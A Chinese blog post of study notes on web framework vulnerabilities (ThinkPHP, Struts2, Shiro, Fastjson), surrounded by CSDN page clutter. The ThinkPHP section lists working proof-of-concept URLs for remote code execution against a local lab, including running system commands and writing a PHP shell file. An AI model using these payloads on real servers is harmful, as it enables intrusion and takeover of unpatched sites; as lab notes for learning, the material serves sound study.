Web应用安全

最新推荐文章于 2024-05-21 20:18:03 发布
最新推荐文章于 2024-05-21 20:18:03 发布
阅读量110 收藏
点赞数
文章标签: 安全 java 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_75056154/article/details/129871619
版权

Web应用安全Thinkphp Stuts2与Shiro

Thinkphp远程代码执行

dokcer漏洞环境

docker-compose
  https://github. com/vu1hub/vu1hub/tree/master/ thinkphp

漏洞介绍

由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞

影响版本:
ThinkPHP = 2.1
ThinkPHP < 5.0.23
ThinkPHP < 5.1.31

修复版本:
ThinkPHP 5.0.23
ThinkPHP 5.1.31

直接调用内置函数执行命令:
POC1:http://127.0.0.1:81/?s=index/\think\Request/ input&filter=phpinfo&data=1
POC2:
http://127.0.0.1:81/ ?s=index/\think\Request/input&filter=system&data=id
POC3:
http://127.0.0.1:81/?s=index/\think/\template\driver\file/write&cacheFile-shell.php&content=%3C?php%20phpinfo(); ?%3E

回调函数执行命令:
POC1:
http://127.0.0.1:81/?s=index/\think \app/ invokefunction&function=call_user_func_ array&vars [0]=phpinfo&vars[1][]=1
POC2:
http://127.0.0.1:81/ ?s=index/\think \Container/ invokefunction&function=call_user_func_array&vars [0]=phpinfo&vars[1] [ ]=1

这里和前一步骤使用多种内置函数。例如:copy、file_get_contents、file_put_contents等

Stuts2代码执行

漏洞概述

Apache Struts 2是一个用于开发Java EE网络应用程序开放源代码网页应用程序架构。Struts框架使用OGNL作为默认的表达式语言。在其代码中,由于函数逻辑把控不严谨,导致代码执行漏洞的产生(CVE-2019-0230)

Shiro反序列化漏洞

漏洞介绍

Apache Shiro是一款开源安全框架, 提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。

Apache Shiro 1.2.4及以前版本中(大于该版本也可能会有这个问题) ,加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。

发现网站记住密码的功能,登录抓包在返回包中发现了rememberMe的shiro特征字段

Faastjson远程代码执行漏洞

漏洞简介

Fastjson是阿里巴巴公司开源的一款json解析器, 其性能优越,被广泛应用于各大厂商的Java项目中。fastjson于1.2.24版本后增加了 反序列化白名单,而在1 .2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。

m0_75056154
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
信息安全技术Web应用安全检测系统安全技术要求和测试评价方法.pdf
08-12
信息安全技术Web应用安全检测系统安全技术要求和测试评价方法.pdf
Web应用十大安全漏洞
weixin_52281518的博客
01-28 4978
Web应用十大安全漏洞 开放Web应用程序安全项目通过调查,列出了对Web应用的危害较大的10个安全问题,也是业界集中关注最严重的问题。主要包括:未验证参数、访问控制缺陷、账户及会话管理缺陷、跨网站脚本漏洞、缓冲区溢出、命令注入漏洞、错误处理问题、密码学使用不当、远程管理漏洞、Web服务器及应用服务器配置不当. 未验证参数:Web请求返回的信息没有经过有效性验证就提交给Web应用程序使用。攻击者可以利用返回信息中的缺陷,包括URL、请求字符串、cookie头部、表单项,隐含参数传递代码攻击运行Web程...
Web 应用安全发展的介绍
Wang的专栏
03-27 1943
也叫Web应用安全,互联网本身是安全的,自从有了研究安全的人之后,互联网就变得不安全了。
Web应用安全防护
weixin_36087172的博客
08-04 6589
该文档基于MatriXay和Acunetix等安全测试工具的测试报告,根据漏洞的类型,提供相应的解决办法。
OWASP TOP 10-2021年十大Web应用安全风险榜单
小龙人
11-03 3579
OWASP(Open Web Application Security Project)是一个开源的、非盈利的全球性安全组织。 OWASP不定期发布关于web应用的十大威胁安全报告(OWASP Top 10),会在经过安全专家的测验之后确定十大类对当前web应用威胁最大和被应用最广的漏洞,同时也会对其进行详细的分析威胁所在。美国联邦贸易委员会(FTC)强烈建议所有的企业都需要遵守以保证信息安全。 2021年前10名发生的变化 有三个新类别,四个类别的命名和范围发生了变化,并在 2021 年的前 10 .
十大开源Web应用安全测试工具
weixin_45727359的博客
05-22 3423
点击蓝字关注我们Web应用安全测试可对Web应用程序执行功能测试,找到尽可能多的安全问题,大大降低黑客入侵几率。在研究并推荐一些最佳的开源Web应用安全测试工具之前,让我们首先了解一下安...
Web应用安全评估参考手册
09-05
为80页PDF文件,包括最常见的web应用安全评估漏洞测试方法、描述以及修复方法 这是笔者从业近多年以来,收纳整理的Web安全评估参考,里面记录了近年来比较常见的,危害没那么低的漏洞测试方法,漏洞出现的场景、描述...
web应用安全基线
03-27
web应用安全基线,适用于web应用Web应用提供了应当遵循的安全标准
web应用安全与加速课程讲义.pdf
08-29
web应用安全与加速详解
Web应用安全:HTTP协议GET和POST的使用区别实验.docx
06-17
实验目的 ... 二、实验用到的工具软件 firefox的firebug插件 抓包工具wireshark 三、实验内容与步骤 ...<script type="text/javascript" src="jquery-1.8.0.min.js"></script> ...<input type="submit" value="
[图解]SysML和EA建模住宅安全系统-05
rolt的专栏
05-18 654
作用就是定义属性之间的数学关系
Nginx - 安全基线配置与操作指南
小工匠
05-19 916
我们这里主要介绍针对Nginx中间件的安全基线配置指南,包括版本选择、用户创建、权限设置、缓冲区配置、日志管理、访问限制、错误页面处理、并发控制、补丁更新等方面。同时还涵盖了如何配置正向代理模块、防止目录遍历以及服务监控等内容,旨在指导系统管理员确保中间件服务器的安全性本文档规定了中间件服务器应当遵循的安全性设置标准,旨在指导系统管理人员或安全检查人员进行中间件的安全合规性检查和配置。
[图解]SysML和EA建模住宅安全系统-07 to be块定义图
rolt的专栏
05-21 666
然后再针对这个画一个块内部图,然后这里再把签名拖上去
HLS视频加密,让您的视频内容更安全
云存储小天使的博客
05-21 425
HLS视频加密是一种基于HTTP Live Streaming(HLS)协议的加密技术。它的核心思想是将视频切片进行加密处理,在客户端播放时需要先获取解密密钥才能正常偶发。通过这种方式,HLS加密可以有效防止未经授权的第三方窃取视频内容,从而保障了视频内容的版权和安全。数据万象媒体处理服务提供了一套HLS视频加密方案,方便用户各个场景的需求。
如何选择一款安全高效的数据自动同步工具?
文件数据安全交换
05-21 173
飞驰云联是中国领先的数据安全传输解决方案提供商,长期专注于安全可控、性能卓越的数据传输技术和解决方案,公司产品和方案覆盖了跨网跨区域的数据安全交换、供应链数据安全传输、数据传输过程的防泄漏、FTP的增强和国产化替代、文件传输自动化和传输集成等各种数据传输场景。由于大部分的数据都是需要实时的同步到其他节点进行使用和分析的,原有的数据传输方式没有任何的消息通知,也没有日志记录可查询,需要靠人工去各个节点确认,费时费力,效率低下;提供完善的数据同步日志和用户操作日志,便于查询和审计,快速排查错误或遗漏。
深度学习之基于YoloV5的建筑场所安全检测系统
2301_79810943的博客
05-21 252
一、项目背景与目标随着城市化进程的加速,建筑场所的安全问题日益受到关注。为了实现对建筑场所的全面、实时监控,并及时发现潜在的安全隐患,本项目旨在利用深度学习技术,开发一个基于YoloV5算法的建筑场所安全检测系统。二、技术选型与特点YoloV5算法:本项目采用YoloV5作为核心检测算法。YoloV5以其高精度、快速检测速度和强大的多尺度检测能力著称,非常适合用于复杂建筑场所的安全检测。
检测高空作业人员安全绳是否佩戴系统
最新发布
燧机科技的博客
05-21 178
检测高空作业人员安全绳是否佩戴系统基于AI视觉智能分析算法,检测高空作业人员安全绳是否佩戴系统通过现场摄像头对高处作业区域内的人员进行自动检测识别。系统能够快速、准确地检测高空作业人员是否佩戴安全绳。一旦系统检测到人员未佩戴安全绳,会立即进行告警,并将告警信息推送给相关管理者。检测高空作业人员安全绳是否佩戴系统通过实时检测和告警,系统可以及时发现安全隐患,并采取相应措施防范事故的发生。该系统采用视频图像自动识别的形式,不需要新增硬件,实时监控识别,实时告警,简单方便。
Web应用防火墙的重要性
XRY_XIAO的博客
05-20 407
Web应用防火墙的重要性
家用充电桩远程监控安全管理系统解决方案
蓝蜂物联网
05-15 279
本方案旨在通过先进的物联网技术、云计算、大数据分析以及人工智能等科技手段,构建一个集实时监测、异常预警、故障诊断、数据统计、远程控制于一体的智能化平台,确保充电桩的安全运行及用户充电过程的便捷性与安全性。综上所述,家用充电桩远程监控安全管理系统解决方案深度融合物联网、云计算、大数据分析和人工智能等前沿技术,实现了充电桩的精细化、智能化管理,不仅提升了用户充电体验,降低了运维成本,也为能源管理的智能化转型注入了强大动力,具有显著的社会效益和经济效益。家用充电桩远程监控安全管理系统解决方案。
web应用安全管理思路
05-14
Web应用安全管理的思路应该从以下几个方面入手: 1. 安全策略:确定安全策略,包括安全目标、安全措施、安全流程等,以确保Web应用开发、部署、维护和更新过程中的安全性。 2. 风险评估:对Web应用进行风险评估...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值